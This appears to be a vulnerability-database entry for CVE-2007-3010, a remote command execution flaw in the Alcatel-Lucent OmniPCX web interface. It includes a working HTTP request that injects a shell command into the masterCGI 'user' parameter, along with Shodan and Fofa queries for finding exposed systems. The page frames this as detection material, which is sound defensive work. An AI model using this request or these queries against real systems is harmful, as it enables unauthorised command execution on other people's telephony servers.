🔙 목록으로 돌아가기

CVE-2007-3010: Alcatel-Lucent OmniPCX - Remote Command Execution

TitleAlcatel-Lucent OmniPCX - Remote Command Execution
Authorking-alexander
SeverityCritical
ImpactAny user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
RemediationUpdate to supported versions that filter shell metacharacters in the "user" parameter.
CVSS Score10
EPSS Score0.94007
CVE IDCVE-2007-3010
CWE IDCWE-20
Shodan Querytitle:"OmniPCX for Enterprise"http.title:"omnipcx for enterprise"
Fofa Queryapp="Alcatel_Lucent-OmniPCX-Enterprise"app="alcatel_lucent-omnipcx-enterprise"title="omnipcx for enterprise"
Tags cve cve2007 kev rce alcatel alcatel-lucent vkev vuln

🔍 Vulnerability Description

The OmniPCX web interface has a script “masterCGI” with a remote command execution vulnerability via the “user” parameter.

🌐 HTTP Request

GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2007/CVE-2007-3010.yaml

🦈 Packet Capture: ⬇️ Download cve-2007-3010.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A